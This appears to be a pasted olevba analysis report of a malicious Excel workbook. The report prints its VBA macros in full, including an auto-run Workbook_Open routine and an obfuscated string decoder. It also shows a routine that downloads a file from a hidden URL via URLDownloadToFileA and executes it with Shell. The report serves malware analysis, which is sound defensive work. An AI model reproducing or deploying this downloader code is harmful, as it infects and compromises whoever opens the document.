Malicious Excel macro

dynamoo Feb 25th, 2015 304 Never
Flags       Filename
----------- -----------------------------------------------------------------
OLE:MAS---- car015~1.xls

(Flags: OpX=OpenXML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)

===============================================================================
FILE: car015~1.xls
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ÝòàÊíèãà.cls
in file: car015~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u042d\u0442\u0430\u041a\u043d\u0438\u0433\u0430'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub Workbook_Open()
jQ5
End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
+----------+---------------+----------------------------------------+
| Type     | Keyword       | Description                            |
+----------+---------------+----------------------------------------+
| AutoExec | Workbook_Open | Runs when the Excel Workbook is opened |
+----------+---------------+----------------------------------------+
-------------------------------------------------------------------------------
VBA MACRO Ëèñò1.cls
in file: car015~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04421'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Ëèñò2.cls
in file: car015~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04422'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Ëèñò3.cls
in file: car015~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04423'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Class1.cls
in file: car015~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Class2.cls
in file: car015~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Class3.cls
in file: car015~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Module1.bas
in file: car015~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Public Function vxRuzMJsFffGPcDYCb(AUKBPaIIvwQgsU As String) As String
GoTo jvLMiktQy
jvLMiktQy:
GoTo YexFubVVUa
YexFubVVUa:
For SrJVJGASPnQ = 1 To Len(AUKBPaIIvwQgsU) Step 2
GoTo pPBRUYPoRwgcQlcS
pPBRUYPoRwgcQlcS:
GoTo ZZMyawIQEV
ZZMyawIQEV:
GoTo maQQjhDZxDzLOdzA
maQQjhDZxDzLOdzA:
GoTo OsHauNHxdmnlqbTbFSR
OsHauNHxdmnlqbTbFSR:
GoTo ogETMxfh
ogETMxfh:
vxRuzMJsFffGPcDYCb = vxRuzMJsFffGPcDYCb & Mid(AUKBPaIIvwQgsU, SrJVJGASPnQ, 1)
GoTo wGcpdOq
wGcpdOq:
Next
GoTo UmYcCdoiA
UmYcCdoiA:
GoTo pOGCNfuPDMkfIKrKQZN
pOGCNfuPDMkfIKrKQZN:
GoTo DBGekrVjiyCEw
DBGekrVjiyCEw:
GoTo dNvxRuzM
dNvxRuzM:
GoTo FffGPcDYCb
FffGPcDYCb:
GoTo tEyQzQGQQSfvKRTdAv
tEyQzQGQQSfvKRTdAv:
End Function

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
No suspicious keyword or IOC found.
-------------------------------------------------------------------------------
VBA MACRO Class4.cls
in file: car015~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class4'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Class5.cls
in file: car015~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class5'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Class6.cls
in file: car015~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class6'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO dfgfdg.bas
in file: car015~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/dfgfdg'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#If VBA7 Then
    Private Declare PtrSafe Function FnjkHBKJBl Lib "urlmon" Alias _
    "URLDownloadToFileA" (ByVal sdfFFF As LongPtr, _
    ByVal kJNJKBl As String, _
    ByVal ghjVFF As String, _
    ByVal BGgdhF As Long, _
    ByVal VVgfh As LongPtr) As LongPtr
#Else
    Private Declare Function FnjkHBKJBl Lib "urlmon" Alias _
    "URLDownloadToFileA" (ByVal sdfFFF As Long, _
    ByVal kJNJKBl As String, _
    ByVal ghjVFF As String, _
    ByVal BGgdhF As Long, _
    ByVal VVgfh As Long) As Long
#End If
Sub jQ5()
mog4O4d49 vxRuzMJsFffGPcDYCb("h@t?t^pJ:P/@/pjCac{eXkBhioWnEd`eslR.Rw9.9inn~t2ehr*ifa1.SpjlS/NjCsf/`b(imn.)e…x8eX"), Environ(vxRuzMJsFffGPcDYCb("TgMJPW")) & vxRuzMJsFffGPcDYCb("\eG…HUjSkrd_fdgT.„eXx/e+")
End Sub
Function mog4O4d49(Mh9_094suu As String, R4_t As String) As Boolean
vJHKBJdfkgfg = FnjkHBKJBl(0&, Mh9_094suu, R4_t, 0&, 0&)
Dim j_W8
j_W8 = Shell(R4_t, 1)
End Function

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
+------------+--------------------+-----------------------------------------+
| Type       | Keyword            | Description                             |
+------------+--------------------+-----------------------------------------+
| Suspicious | Lib                | May run code from a DLL                 |
| Suspicious | Shell              | May run an executable file or a system  |
|            |                    | command                                 |
| Suspicious | Environ            | May read system environment variables   |
| Suspicious | URLDownloadToFileA | May download files from the Internet    |
+------------+--------------------+-----------------------------------------+
-------------------------------------------------------------------------------
VBA MACRO Class7.cls
in file: car015~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class7'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Module2.bas
in file: car015~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Class8.cls
in file: car015~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class8'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Class9.cls
in file: car015~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class9'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Class10.cls
in file: car015~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class10'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)